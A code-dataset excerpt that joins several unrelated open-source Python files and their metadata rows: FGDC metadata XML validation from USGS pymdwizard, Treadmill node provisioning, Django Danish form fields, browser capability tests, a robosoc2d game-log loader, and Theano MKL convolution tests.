tree_node = xml_utils.string_to_node(xml_str.encode("utf-8"))
lxml._etree._ElementTree(tree_node)
errors = []
srcciteas = []
src_xpath = "dataqual/lineage/srcinfo/srccitea"
src_nodes = tree_node.xpath(src_xpath)
for i, src in enumerate(src_nodes):
srcciteas.append(src.text)
if src.text is None:
if len(src_nodes) == 1:
errors.append(
(
"metadata/" + src_xpath,
"source citation abbreviation cannot be empty",
1,
)
)
else:
xpath = "metadata/dataqual/lineage/srcinfo[{}]/srccitea"
errors.append(
(
xpath.format(i + 1),
"source citation abbreviation cannot be empty",
1,
)
)
procstep_xpath = "dataqual/lineage/procstep"
procstep_nodes = tree_node.xpath(procstep_xpath)
for proc_i, proc in enumerate(procstep_nodes):
srcprod_nodes = proc.xpath("srcprod")
for srcprod_i, srcprod in enumerate(srcprod_nodes):
srcciteas.append(srcprod.text)
if srcprod.text is None:
error_xpath = procstep_xpath
if len(procstep_nodes) > 1:
error_xpath += "[{}]".format(proc_i + 1)
error_xpath += "/srcprod"
if len(srcprod_nodes) > 1:
error_xpath += "[{}]".format(proc_i + 1)
errors.append(
(
"metadata/" + error_xpath,
"source produced abbreviation cannot be empty",
1,
)
)
srcused_xpath = "dataqual/lineage/procstep/srcused"
srcused_nodes = tree_node.xpath(srcused_xpath)
for i, src in enumerate(srcused_nodes):
if src.text not in srcciteas:
if len(srcused_nodes) == 1:
errors.append(
(
"metadata/" + srcused_xpath,
"Source Used Citation Abbreviation {} "
"not found in Source inputs "
"used".format(src.text),
1,
)
)
else:
xpath = "metadata/dataqual/lineage/procstep[{}]/srcused"
errors.append(
(
xpath.format(i + 1),
"Source Used Citation Abbreviation {} "
"not found in Source inputs "
"used".format(src.text),
1,
)
)
if xmlschema.validate(tree_node) and not errors:
return []
line_lookup = dict(
[
(e.sourceline, tree_node.getroottree().getpath(e))
for e in tree_node.xpath(".//*")
]
)
sourceline = tree_node.sourceline
line_lookup[sourceline] = tree_node.getroottree().getpath(tree_node)
fgdc_lookup = get_fgdc_lookup()
for error in xmlschema.error_log:
error_msg = clean_error_message(error.message, fgdc_lookup)
try:
errors.append((line_lookup[error.line][1:], error_msg, error.line))
except KeyError:
errors.append(("Unknown", error_msg, error.line))
errors = list(OrderedDict.fromkeys(errors))
if as_dataframe:
cols = ["xpath", "message", "line number"]
return pd.DataFrame.from_records(errors, columns=cols)
else:
return errors
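# Hypothetical usage sketch for validate_xml (the record name "my_record.xml"
# is an assumption):
#
#   errors = validate_xml("my_record.xml", xsl_fname="bdp", as_dataframe=True)
#   # errors is a DataFrame with "xpath", "message" and "line number" columns;
#   # an empty result means the record passed schema validation.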
def get_fgdc_lookup():
"""
Loads the local resource, 'bdp_lookup' into a json object
Returns
-------
json fgdc item lookup
"""
annotation_lookup_fname = utils.get_resource_path("FGDC/bdp_lookup")
try:
with open(annotation_lookup_fname, encoding="utf-8") as data_file:
annotation_lookup = json.loads(data_file.read())
except TypeError:
with open(annotation_lookup_fname) as data_file:
annotation_lookup = json.loads(data_file.read())
return annotation_lookup
def clean_error_message(message, fgdc_lookup=None):
"""
Returns a cleaned up, more informative translation
of a raw xml schema error message.
Empty or missing elements are described in plain English
Parameters
----------
message : str
The raw message we will be cleaning up
Returns
-------
str : cleaned up error message
"""
parts = message.split()
if "Missing child element" in message:
clean_message = "The {} is missing the expected element(s) '{}'"
        clean_message = clean_message.format(parts[1][:-1], parts[-2])
elif (
r"' is not accepted by the pattern '\s*\S(.|\n|\r)*'" in message
or "'' is not a valid value of the atomic type" in message
):
shortname = parts[1][:-1].replace("'", "")
try:
longname = fgdc_lookup[shortname]["long_name"]
except (KeyError, TypeError):
longname = None
if longname is None:
name = shortname
else:
name = "{} ({})".format(longname, shortname)
clean_message = "The value for {} cannot be empty"
clean_message = clean_message.format(name)
else:
clean_message = message
return clean_message
def format_date(date_input):
"""
Convert a Python date object into an FGDC string format YYYYMMDD
Parameters
----------
date_input : str or datetime
if str provided must be in format that dateutil's parser can handle
Returns
-------
    str : date formatted in FGDC YYYYMMDD format
"""
if type(date_input) == str:
date_input = parser.parse(date_input)
return date_input.strftime("%Y%m%d")
| 33.993103
| 79
| 0.582674
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
"""
The MetadataWizard(pymdwizard) software was developed by the
U.S. Geological Survey Fort Collins Science Center.
See: https://github.com/usgs/fort-pymdwizard for current project source code
See: https://usgs.github.io/fort-pymdwizard/ for current user documentation
See: https://github.com/usgs/fort-pymdwizard/tree/master/examples
for examples of use in other scripts
License: Creative Commons Attribution 4.0 International (CC BY 4.0)
http://creativecommons.org/licenses/by/4.0/
PURPOSE
------------------------------------------------------------------------------
Module contains utility functions for interacting with XML FGDC records
SCRIPT DEPENDENCIES
------------------------------------------------------------------------------
This script is part of the pymdwizard package and is not intended to be
used independently. All pymdwizard package requirements are needed.
See imports section for external packages used in this script as well as
inter-package dependencies
U.S. GEOLOGICAL SURVEY DISCLAIMER
------------------------------------------------------------------------------
This software has been approved for release by the U.S. Geological Survey
(USGS). Although the software has been subjected to rigorous review,
the USGS reserves the right to update the software as needed pursuant to
further analysis and review. No warranty, expressed or implied, is made by
the USGS or the U.S. Government as to the functionality of the software and
related material nor shall the fact of release constitute any such warranty.
Furthermore, the software is released on condition that neither the USGS nor
the U.S. Government shall be held liable for any damages resulting from
its authorized or unauthorized use.
Any use of trade, product or firm names is for descriptive purposes only and
does not imply endorsement by the U.S. Geological Survey.
Although this information product, for the most part, is in the public domain,
it also contains copyrighted material as noted in the text. Permission to
reproduce copyrighted items for other than personal use must be secured from
the copyright owner.
------------------------------------------------------------------------------
"""
import json
from dateutil import parser
import defusedxml.lxml as lxml
import pandas as pd
from pymdwizard.core import xml_utils
from pymdwizard.core import utils
from collections import OrderedDict
FGDC_XSD_NAME = "FGDC/fgdc-std-001-1998-annotated.xsd"
BDP_XSD_NAME = "FGDC/BDPfgdc-std-001-1998-annotated.xsd"
def validate_xml(xml, xsl_fname="fgdc", as_dataframe=False):
"""
Parameters
----------
xml : lxml document
or
filename
or
string containing xml representation
xsl_fname : str (optional)
can be one of:
'fgdc' - uses the standard fgdc schema
../resources/FGDC/fgdc-std-001-1998-annotated.xsd
'bdp' = use the Biological Data profile schema,
../resources/FGDC/BDPfgdc-std-001-1998-annotated.xsd
full file path to another local schema.
if not specified defaults to 'fgdc'
as_dataframe : bool
used to specify return format (list of tuples or dataframe)
Returns
-------
list of tuples
(xpath, error message, line number)
or
pandas dataframe
"""
if xsl_fname.lower() == "fgdc":
xsl_fname = utils.get_resource_path(FGDC_XSD_NAME)
elif xsl_fname.lower() == "bdp":
xsl_fname = utils.get_resource_path(BDP_XSD_NAME)
else:
xsl_fname = xsl_fname
xmlschema = xml_utils.load_schema(xsl_fname)
xml_doc = xml_utils.xml_document_loader(xml)
xml_str = xml_utils.node_to_string(xml_doc)
tree_node = xml_utils.string_to_node(xml_str.encode("utf-8"))
lxml._etree._ElementTree(tree_node)
errors = []
srcciteas = []
src_xpath = "dataqual/lineage/srcinfo/srccitea"
src_nodes = tree_node.xpath(src_xpath)
for i, src in enumerate(src_nodes):
srcciteas.append(src.text)
if src.text is None:
if len(src_nodes) == 1:
errors.append(
(
"metadata/" + src_xpath,
"source citation abbreviation cannot be empty",
1,
)
)
else:
xpath = "metadata/dataqual/lineage/srcinfo[{}]/srccitea"
errors.append(
(
xpath.format(i + 1),
"source citation abbreviation cannot be empty",
1,
)
)
procstep_xpath = "dataqual/lineage/procstep"
procstep_nodes = tree_node.xpath(procstep_xpath)
for proc_i, proc in enumerate(procstep_nodes):
srcprod_nodes = proc.xpath("srcprod")
for srcprod_i, srcprod in enumerate(srcprod_nodes):
srcciteas.append(srcprod.text)
if srcprod.text is None:
error_xpath = procstep_xpath
if len(procstep_nodes) > 1:
error_xpath += "[{}]".format(proc_i + 1)
error_xpath += "/srcprod"
if len(srcprod_nodes) > 1:
error_xpath += "[{}]".format(proc_i + 1)
errors.append(
(
"metadata/" + error_xpath,
"source produced abbreviation cannot be empty",
1,
)
)
srcused_xpath = "dataqual/lineage/procstep/srcused"
srcused_nodes = tree_node.xpath(srcused_xpath)
for i, src in enumerate(srcused_nodes):
if src.text not in srcciteas:
if len(srcused_nodes) == 1:
errors.append(
(
"metadata/" + srcused_xpath,
"Source Used Citation Abbreviation {} "
"not found in Source inputs "
"used".format(src.text),
1,
)
)
else:
xpath = "metadata/dataqual/lineage/procstep[{}]/srcused"
errors.append(
(
xpath.format(i + 1),
"Source Used Citation Abbreviation {} "
"not found in Source inputs "
"used".format(src.text),
1,
)
)
if xmlschema.validate(tree_node) and not errors:
return []
line_lookup = dict(
[
(e.sourceline, tree_node.getroottree().getpath(e))
for e in tree_node.xpath(".//*")
]
)
sourceline = tree_node.sourceline
line_lookup[sourceline] = tree_node.getroottree().getpath(tree_node)
fgdc_lookup = get_fgdc_lookup()
for error in xmlschema.error_log:
error_msg = clean_error_message(error.message, fgdc_lookup)
try:
errors.append((line_lookup[error.line][1:], error_msg, error.line))
except KeyError:
errors.append(("Unknown", error_msg, error.line))
errors = list(OrderedDict.fromkeys(errors))
if as_dataframe:
cols = ["xpath", "message", "line number"]
return pd.DataFrame.from_records(errors, columns=cols)
else:
return errors
def get_fgdc_lookup():
"""
Loads the local resource, 'bdp_lookup' into a json object
Returns
-------
json fgdc item lookup
"""
annotation_lookup_fname = utils.get_resource_path("FGDC/bdp_lookup")
try:
with open(annotation_lookup_fname, encoding="utf-8") as data_file:
annotation_lookup = json.loads(data_file.read())
except TypeError:
with open(annotation_lookup_fname) as data_file:
annotation_lookup = json.loads(data_file.read())
return annotation_lookup
def clean_error_message(message, fgdc_lookup=None):
"""
Returns a cleaned up, more informative translation
of a raw xml schema error message.
Empty or missing elements are described in plain English
Parameters
----------
message : str
The raw message we will be cleaning up
Returns
-------
str : cleaned up error message
"""
parts = message.split()
if "Missing child element" in message:
clean_message = "The {} is missing the expected element(s) '{}'"
        clean_message = clean_message.format(parts[1][:-1], parts[-2])
elif (
r"' is not accepted by the pattern '\s*\S(.|\n|\r)*'" in message
or "'' is not a valid value of the atomic type" in message
):
shortname = parts[1][:-1].replace("'", "")
try:
longname = fgdc_lookup[shortname]["long_name"]
except (KeyError, TypeError):
longname = None
if longname is None:
name = shortname
else:
name = "{} ({})".format(longname, shortname)
clean_message = "The value for {} cannot be empty"
clean_message = clean_message.format(name)
else:
clean_message = message
return clean_message
def format_date(date_input):
"""
Convert a Python date object into an FGDC string format YYYYMMDD
Parameters
----------
date_input : str or datetime
if str provided must be in format that dateutil's parser can handle
Returns
-------
    str : date formatted in FGDC YYYYMMDD format
"""
if type(date_input) == str:
date_input = parser.parse(date_input)
return date_input.strftime("%Y%m%d")
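# Worked example for format_date above (the input literal is illustrative):
# format_date("May 3, 2021") parses the string with dateutil and returns
# "20210503"; a datetime/date object for 2021-05-03 gives the same result.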
| 0
| 0
| 0
|
8f8f0545a32a374fa4e403b6c4173448c8aebaaf
| 2,113
|
py
|
Python
|
lib/python/treadmill/infra/setup/node.py
|
bretttegart/treadmill
|
812109e31c503a6eddaee2d3f2e1faf2833b6aaf
|
[
"Apache-2.0"
] | 2
|
2017-10-31T18:48:20.000Z
|
2018-03-04T20:35:20.000Z
|
lib/python/treadmill/infra/setup/node.py
|
bretttegart/treadmill
|
812109e31c503a6eddaee2d3f2e1faf2833b6aaf
|
[
"Apache-2.0"
] | null | null | null |
lib/python/treadmill/infra/setup/node.py
|
bretttegart/treadmill
|
812109e31c503a6eddaee2d3f2e1faf2833b6aaf
|
[
"Apache-2.0"
] | null | null | null |
from treadmill.infra.setup import base_provision
from treadmill.infra import configuration, constants, instances
from treadmill.api import ipa
| 29.347222
| 67
| 0.482726
|
from treadmill.infra.setup import base_provision
from treadmill.infra import configuration, constants, instances
from treadmill.api import ipa
class Node(base_provision.BaseProvision):
def setup(
self,
image,
key,
tm_release,
instance_type,
app_root,
with_api,
ipa_admin_password,
proid,
subnet_name
):
ldap_hostname, zk_hostname = self.hostnames_for(roles=[
constants.ROLES['LDAP'],
constants.ROLES['ZOOKEEPER'],
])
_ipa = ipa.API()
_node_hostnames = self._hostname_cluster(count=1)
for _idx in _node_hostnames.keys():
_node_h = _node_hostnames[_idx]
otp = _ipa.add_host(hostname=_node_h)
self.name = _node_h
self.configuration = configuration.Node(
tm_release=tm_release,
app_root=app_root,
ldap_hostname=ldap_hostname,
otp=otp,
with_api=with_api,
hostname=_node_h,
ipa_admin_password=ipa_admin_password,
proid=proid,
zk_url=self._zk_url(zk_hostname)
)
super().setup(
image=image,
count=1,
key=key,
instance_type=instance_type,
subnet_name=subnet_name,
sg_names=[constants.COMMON_SEC_GRP],
)
def destroy(self, instance_id=None):
if instance_id:
_instances = instances.Instances.get(ids=[instance_id])
elif self.name:
_instances = instances.Instances.get(
filters=[
{
'Name': 'tag-key',
'Values': ['Name']
},
{
'Name': 'tag-value',
'Values': [self.name]
},
]
)
else:
return
_instances.terminate()
| 1,873
| 20
| 76
|
fa35d2742f0af2fece6c31ef5a0689b9bda6cc31
| 898
|
py
|
Python
|
localflavor/dk/forms.py
|
int2k/django-localflavor
|
fcda7f3aa3685f15f031b7d9b78f02e19ac5fb0b
|
[
"BSD-3-Clause"
] | 1
|
2020-07-12T23:24:38.000Z
|
2020-07-12T23:24:38.000Z
|
localflavor/dk/forms.py
|
KonstantinKlepikov/django-localflavor
|
87133f6cea1799e0b5e073dbc727dc88746f8fa8
|
[
"BSD-3-Clause"
] | null | null | null |
localflavor/dk/forms.py
|
KonstantinKlepikov/django-localflavor
|
87133f6cea1799e0b5e073dbc727dc88746f8fa8
|
[
"BSD-3-Clause"
] | 1
|
2020-01-17T16:26:54.000Z
|
2020-01-17T16:26:54.000Z
|
"""Denmark specific Form helpers."""
from django.core.exceptions import ValidationError
from django.forms import fields, widgets
from django.utils.translation import gettext_lazy as _
from .dk_municipalities import DK_MUNICIPALITIES
from .dk_postalcodes import DK_POSTALCODES
class DKPostalCodeField(fields.CharField):
"""An Input widget that uses a list of Danish postal codes as valid input."""
default_validators = [postal_code_validator]
class DKMunicipalitySelect(widgets.Select):
"""A Select widget that uses a list of Danish municipalities (kommuner) as its choices."""
| 33.259259
| 94
| 0.759465
|
"""Denmark specific Form helpers."""
from django.core.exceptions import ValidationError
from django.forms import fields, widgets
from django.utils.translation import gettext_lazy as _
from .dk_municipalities import DK_MUNICIPALITIES
from .dk_postalcodes import DK_POSTALCODES
def postal_code_validator(value):
if value not in [entry[0] for entry in DK_POSTALCODES]:
raise ValidationError(_('Enter a postal code in the format XXXX.'))
class DKPostalCodeField(fields.CharField):
"""An Input widget that uses a list of Danish postal codes as valid input."""
default_validators = [postal_code_validator]
class DKMunicipalitySelect(widgets.Select):
"""A Select widget that uses a list of Danish municipalities (kommuner) as its choices."""
def __init__(self, attrs=None, *args, **kwargs):
super().__init__(attrs, choices=DK_MUNICIPALITIES, *args, **kwargs)
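# Hypothetical usage sketch (the form and field names are assumptions):
#
#   from django import forms
#
#   class DKAddressForm(forms.Form):
#       postal_code = DKPostalCodeField()
#       municipality = forms.CharField(widget=DKMunicipalitySelect())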
| 251
| 0
| 50
|
b8de9676b1c3db948ce6ca35eb77076d04fa3617
| 3,445
|
py
|
Python
|
test/unit/test_browser.py
|
sanAkdam/chime
|
1adbddbdddcdc2669086dee60d1bfb2f97535cff
|
[
"BSD-3-Clause"
] | 8
|
2015-02-05T22:12:41.000Z
|
2015-05-15T16:15:14.000Z
|
test/unit/test_browser.py
|
sanAkdam/chime
|
1adbddbdddcdc2669086dee60d1bfb2f97535cff
|
[
"BSD-3-Clause"
] | 168
|
2015-02-02T23:02:52.000Z
|
2015-05-15T21:54:07.000Z
|
test/unit/test_browser.py
|
codeforamerica/bizarro-cms
|
1adbddbdddcdc2669086dee60d1bfb2f97535cff
|
[
"BSD-3-Clause"
] | 5
|
2016-11-20T15:51:32.000Z
|
2021-04-16T09:44:08.000Z
|
import unittest
from unittest import TestCase
from acceptance.browser import Browser
if __name__ == '__main__':
unittest.main()
| 37.043011
| 116
| 0.613933
|
import unittest
from unittest import TestCase
from acceptance.browser import Browser
class TestBrowser(TestCase):
def test_creation(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual('Windows', browser.os)
self.assertEqual('7', browser.os_version)
self.assertEqual('IE', browser.browser)
self.assertEqual('8.0', browser.browser_version)
def test_as_selenium_capabilities(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual(
{'os': 'Windows', 'os_version': '7',
'browser': 'IE', 'browser_version': '8.0'},
browser.as_browserstack_capabilities())
def test_as_browserstack_capabilities_with_extra_info(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual(
{'os': 'Windows', 'os_version': '7',
'browser': 'IE', 'browser_version': '8.0'},
browser.as_browserstack_capabilities())
def test_as_saucelabs_capabilities(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual(
{'platform': 'Windows 7',
'browserName': 'internet explorer', 'version': '8.0', 'foo': 'bar'},
browser.as_saucelabs_capabilities({'foo': 'bar'}))
def test_doesnt_mutate_extra_info(self):
browser = Browser('Windows', '7', "IE", '8.0')
other_info = {'foo': 'bar'}
self.assertEqual(
{'os': 'Windows', 'os_version': '7',
'browser': 'IE', 'browser_version': '8.0', 'foo': 'bar'},
browser.as_browserstack_capabilities(other_info))
self.assertEqual(1, len(other_info.keys()))
def test_from_string_basic(self):
browsers = Browser.from_string("all")
self.assertEqual(9, len(browsers))
browsers = Browser.from_string(None)
self.assertEqual(None, browsers)
browsers = Browser.from_string("")
self.assertEqual(None, browsers)
def test_from_string_unknown(self):
with self.assertRaises(ValueError):
Browser.from_string("arglebargle")
def test_from_string_supported(self):
browsers = Browser.from_string("supported")
self.assertEqual(8, len(browsers))
self.assertFalse(Browser('Windows', '8.1', "IE", '11.0') in browsers)
def test_from_string_with_browser(self):
browsers = Browser.from_string("ie8")
self.assertEqual([Browser('Windows', '7', "IE", '8.0')], browsers)
browsers = Browser.from_string("ie11")
self.assertEqual([Browser('Windows', '8.1', "IE", '11.0'), Browser('Windows', '7', "IE", '11.0')], browsers)
def test_from_string_with_os(self):
browsers = Browser.from_string("win8.1")
for browser in browsers:
self.assertEqual('Windows', browser.os)
self.assertEqual('8.1', browser.os_version)
def test_from_string_with_os_and_browser(self):
browsers = Browser.from_string("win8.1/ie11")
self.assertEqual([Browser('Windows', '8.1', "IE", '11.0')], browsers)
def test_safe_name(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual("windows_7_ie_8_0", browser.safe_name())
def test_as_string(self):
browser = Browser('Windows', '7', 'IE', '8.0')
self.assertEqual('Windows 7 IE 8.0', str(browser))
if __name__ == '__main__':
unittest.main()
| 2,929
| 7
| 373
|
23198638402b93bfa4324851435640a23d8cb61f
| 4,889
|
py
|
Python
|
logplayer/r2files.py
|
rug/robosoc2d
|
7a018f8ef6974f96a44df018b8adb185e2c07c63
|
[
"MIT"
] | null | null | null |
logplayer/r2files.py
|
rug/robosoc2d
|
7a018f8ef6974f96a44df018b8adb185e2c07c63
|
[
"MIT"
] | null | null | null |
logplayer/r2files.py
|
rug/robosoc2d
|
7a018f8ef6974f96a44df018b8adb185e2c07c63
|
[
"MIT"
] | null | null | null |
# (c) 2021 Ruggero Rossi
# Load a Robosoc2d game state log
# supported version: 1.0.0
| 36.214815
| 77
| 0.55676
|
# (c) 2021 Ruggero Rossi
# Load a Robosoc2d game state log
# supported version: 1.0.0
def load_state_log(file_name):
history = None
with open(file_name, 'r') as f:
game={}
version=f.readline()
if len(version)==0 :
return None
game['ver']=version
game['team1_name']=f.readline().strip()
if len(game['team1_name']) == 0:
game['team1_name'] = "Team A"
game['team2_name']=f.readline().strip()
if len(game['team2_name']) == 0:
game['team2_name'] = "Team B"
players=f.readline()
if len(players)==0 :
return None
players= players.split(',')
if len(players)<2:
return None
game['n_players']=[]
if players[0].isdigit():
game['n_players'].append(int(players[0]))
else:
return None
players[1]=players[1].strip('\n')
if players[1].isdigit():
game['n_players'].append(int(players[1]))
else:
return None
settings=f.readline()
if len(settings)==0 :
return None
settings=settings.split(',')
if len(settings) < 34 :
return None
sett={}
sett['ticks_per_time']=int(settings[0])
sett['pitch_length']=float(settings[1])
sett['pitch_width']=float(settings[2])
sett['goal_width']=float(settings[3])
sett['center_radius']=float(settings[4])
sett['pole_radius']=float(settings[5])
sett['ball_radius']=float(settings[6])
sett['player_radius']=float(settings[7])
sett['catch_radius']=float(settings[8])
sett['catch_holding_ticks']=int(settings[9])
sett['kick_radius']=float(settings[10])
sett['kickable_distance']=float(settings[11])
sett['catchable_distance']=float(settings[12])
sett['kickable_angle']=float(settings[13])
sett['kickable_direction_angle']=float(settings[14])
sett['catchable_angle']=float(settings[15])
sett['net_length']=float(settings[16])
sett['catchable_area_length']=float(settings[17])
sett['catchable_area_width']=float(settings[18])
sett['corner_min_distance']=float(settings[19])
sett['throwin_min_distance']=float(settings[20])
sett['out_pitch_limit']=float(settings[21])
sett['max_dash_power']=float(settings[22])
sett['max_kick_power']=float(settings[23])
sett['player_velocity_decay']=float(settings[24])
sett['ball_velocity_decay']=float(settings[25])
sett['max_player_speed']=float(settings[26])
sett['max_ball_speed']=float(settings[27])
sett['catch_probability']=float(settings[28])
sett['player_random_noise']=float(settings[29])
sett['player_direction_noise']=float(settings[30])
sett['player_velocity_direction_mix']=float(settings[31])
sett['ball_inside_player_velocity_displace']=float(settings[32])
sett['after_catch_distance']=float(settings[33].strip('\n'))
game['sett']=sett
ticks=[]
min_line_len=offset=8+game['n_players'][0]*5+game['n_players'][1]*5+4
default_empty=[0]*min_line_len
prev_tick=default_empty
for tick in f:
tick=tick.split(',')
if len(tick) < min_line_len:
print("* error: missing data at tick: "+str(len(ticks)))
tick=prev_tick
t={}
t['score1']=int(tick[1])
t['score2']=int(tick[2])
t['state']=int(tick[3])
t['ball_x']=float(tick[4])
t['ball_y']=float(tick[5])
t['ball_velocity_x']=float(tick[6])
t['ball_velocity_y']=float(tick[7])
t['teams']=[[],[]]
offset=game['n_players'][0]*5
for which_team in range(2):
for i in range(game['n_players'][which_team]):
p={}
p['x']=float(tick[i*5+8+offset*which_team])
p['y']=float(tick[i*5+9+offset*which_team])
p['velocity_x']=float(tick[i*5+10+offset*which_team])
p['velocity_y']=float(tick[i*5+11+offset*which_team])
p['direction']=float(tick[i*5+12+offset*which_team])
t['teams'][which_team].append(p)
offset=(game['n_players'][0]+game['n_players'][1])*5
t['last_touched_team2']=bool(int(tick[8+offset]))
t['starting_team_max_range']=float(tick[9+offset])
t['ball_catched']=int(tick[10+offset])
t['ball_catched_team2']=bool(int(tick[11+offset].strip('\n')))
ticks.append(t)
prev_tick=tick
game['ticks']=ticks
history=game
return history
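# Hypothetical usage sketch for load_state_log (the log file name is an
# assumption):
#
#   history = load_state_log("robosoc2d_state.log")
#   if history is not None:
#       print(history['team1_name'], 'vs', history['team2_name'])
#       print('recorded ticks:', len(history['ticks']))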
| 4,781
| 0
| 23
|
6d78cbb20f53042b0737e27a57734137bf0a0e4c
| 8,198
|
py
|
Python
|
theano/sandbox/mkl/tests/test_conv.py
|
intel/Theano-dev
|
6ca6fd4646f9e958058c7bce52cd51923c05c2f4
|
[
"BSD-3-Clause"
] | 64
|
2016-10-02T20:41:56.000Z
|
2020-03-11T14:59:40.000Z
|
theano/sandbox/mkl/tests/test_conv.py
|
intel/Theano-dev
|
6ca6fd4646f9e958058c7bce52cd51923c05c2f4
|
[
"BSD-3-Clause"
] | 4
|
2017-06-12T05:12:38.000Z
|
2018-03-15T03:16:30.000Z
|
theano/sandbox/mkl/tests/test_conv.py
|
intel/Theano-dev
|
6ca6fd4646f9e958058c7bce52cd51923c05c2f4
|
[
"BSD-3-Clause"
] | 30
|
2016-10-27T21:59:00.000Z
|
2021-02-20T09:55:14.000Z
|
import theano
import unittest
import numpy
from nose.plugins.skip import SkipTest
from theano import tensor as T
from theano.tensor.nnet import conv2d
from theano.sandbox import mkl
from theano.sandbox.mkl.basic_ops import U2IConv, I2U
from theano.sandbox.mkl.mkl_conv import Conv2D
numpy.random.seed(123)
if not mkl.mkl_available:
raise SkipTest('Optional package MKL disabled')
if theano.config.mode == 'FAST_COMPILE':
mode_with_mkl = theano.compile.mode.get_mode('FAST_RUN').including('mkl')
mode_without_mkl = theano.compile.mode.get_mode('FAST_RUN').excluding('mkl')
else:
mode_with_mkl = theano.compile.mode.get_default_mode().including('mkl')
mode_without_mkl = theano.compile.mode.get_default_mode().excluding('mkl')
if __name__ == '__main__':
unittest.main()
| 44.797814
| 123
| 0.639302
|
import theano
import unittest
import numpy
from nose.plugins.skip import SkipTest
from theano import tensor as T
from theano.tensor.nnet import conv2d
from theano.sandbox import mkl
from theano.sandbox.mkl.basic_ops import U2IConv, I2U
from theano.sandbox.mkl.mkl_conv import Conv2D
numpy.random.seed(123)
if not mkl.mkl_available:
raise SkipTest('Optional package MKL disabled')
if theano.config.mode == 'FAST_COMPILE':
mode_with_mkl = theano.compile.mode.get_mode('FAST_RUN').including('mkl')
mode_without_mkl = theano.compile.mode.get_mode('FAST_RUN').excluding('mkl')
else:
mode_with_mkl = theano.compile.mode.get_default_mode().including('mkl')
mode_without_mkl = theano.compile.mode.get_default_mode().excluding('mkl')
class test_mkl_conv_forward(unittest.TestCase):
def test_conv_U2I(self):
images = T.dtensor4('inputs')
a_internal = U2IConv(imshp=(12, 3, 256, 256),
kshp=(12, 3, 3, 3))(images)
out = I2U()(a_internal)
fopt = theano.function([images], out, mode=mode_with_mkl)
ival = numpy.random.rand(12, 3, 256, 256).astype(numpy.float64)
assert numpy.allclose(fopt(ival), ival)
def test_conv_no_bias(self):
images = T.dtensor4('inputs')
weights = T.dtensor4('weights')
images_internal = U2IConv(imshp=(12, 3, 256, 256), kshp=(12, 3, 3, 3))(images)
convOut_internal = Conv2D(imshp=(12, 3, 256, 256), kshp=(12, 3, 3, 3), filter_flip=False)(images_internal, weights)
convOut_user = I2U()(convOut_internal)
ival = numpy.random.rand(12, 3, 256, 256).astype(numpy.float64)
wval = numpy.random.rand(12, 3, 3, 3).astype(numpy.float64)
fopt = theano.function(inputs=[images, weights], outputs=convOut_user, mode=mode_with_mkl)
new_out = fopt(ival, wval)
convOut = conv2d(images, weights, input_shape=(12, 3, 256, 256), filter_shape=(12, 3, 3, 3), filter_flip=False)
fori = theano.function(inputs=[images, weights], outputs=convOut, mode=mode_without_mkl)
old_out = fori(ival, wval)
assert str(fopt.maker.fgraph.toposort()) != str(fori.maker.fgraph.toposort())
assert numpy.allclose(old_out, new_out)
def test_conv_with_bias(self):
images = T.dtensor4('inputs')
weights = T.dtensor4('weights')
bias = T.dvector('bias')
ishape = [(8, 3, 256, 256), (16, 3, 256, 256), (32, 3, 256, 256), (64, 3, 256, 256)]
wshape = [(8, 3, 3, 3), (16, 3, 3, 3), (32, 3, 3, 3), (64, 3, 3, 3)]
for i, ish in enumerate(ishape):
wsh = wshape[i]
images_internal = U2IConv(imshp=ish, kshp=wsh)(images)
convOutBias_internal = Conv2D(imshp=ish, kshp=wsh, filter_flip=False)(images_internal, weights, bias)
convOutBias_user = I2U()(convOutBias_internal)
ival = numpy.random.rand(*ish).astype(numpy.float64)
wval = numpy.random.rand(*wsh).astype(numpy.float64)
bval = numpy.random.rand(wsh[0]).astype(numpy.float64)
fopt = theano.function(inputs=[images, weights, bias], outputs=convOutBias_user, mode=mode_with_mkl)
new_old = fopt(ival, wval, bval)
convOut = conv2d(images, weights, input_shape=ish, filter_shape=wsh, filter_flip=False)
convOutBias = convOut + bias.dimshuffle('x', 0, 'x', 'x')
fori = theano.function(inputs=[images, weights, bias], outputs=convOutBias, mode=mode_without_mkl)
old_out = fori(ival, wval, bval)
assert str(fopt.maker.fgraph.toposort()) != str(fori.maker.fgraph.toposort())
assert numpy.allclose(old_out, new_old)
def test_no_shape(self):
images = T.dtensor4('inputs')
weights = T.dtensor4('weights')
convOut = conv2d(images, weights, filter_shape=(12, 3, 3, 3), filter_flip=False)
fopt = theano.function(inputs=[images, weights], outputs=convOut, mode=mode_with_mkl)
fori = theano.function(inputs=[images, weights], outputs=convOut, mode=mode_without_mkl)
        # No optimization is applied when the image shape is None
assert all([not isinstance(n, (Conv2D, U2IConv, I2U)) for n in fopt.maker.fgraph.toposort()])
assert str(fopt.maker.fgraph.toposort()) == str(fori.maker.fgraph.toposort())
class test_mkl_conv_backward(unittest.TestCase):
def test_conv_no_bias(self):
images = T.dtensor4('input_conv')
weights = T.dtensor4('weights')
images_internal = U2IConv(imshp=(12, 3, 256, 256), kshp=(12, 3, 3, 3))(images)
convOut = Conv2D(imshp=(12, 3, 256, 256), kshp=(12, 3, 3, 3), filter_flip=False)(images_internal, weights)
convOut_user = I2U()(convOut)
convOutLoss = T.mean(convOut_user)
conv_op_di = T.grad(convOutLoss, images)
conv_op_dk = T.grad(convOutLoss, weights)
convOutBack = [conv_op_di, conv_op_dk]
ival = numpy.random.rand(12, 3, 256, 256).astype(numpy.float64)
wval = numpy.random.rand(12, 3, 3, 3).astype(numpy.float64)
fopt = theano.function(inputs=[images, weights], outputs=convOutBack, mode=mode_with_mkl)
new_out = fopt(ival, wval)
convOut = conv2d(images, weights, input_shape=(12, 3, 256, 256), filter_shape=(12, 3, 3, 3), filter_flip=False)
convOutLoss = T.mean(convOut)
conv_op_di = T.grad(convOutLoss, images)
conv_op_dk = T.grad(convOutLoss, weights)
convOutBack = [conv_op_di, conv_op_dk]
fori = theano.function(inputs=[images, weights], outputs=convOutBack, mode=mode_without_mkl)
old_out = fori(ival, wval)
assert len(fopt.maker.fgraph.toposort()) != len(fori.maker.fgraph.toposort())
assert numpy.allclose(old_out[0], new_out[0])
assert new_out[0].dtype == 'float64'
# weightsGrad Layout is different.
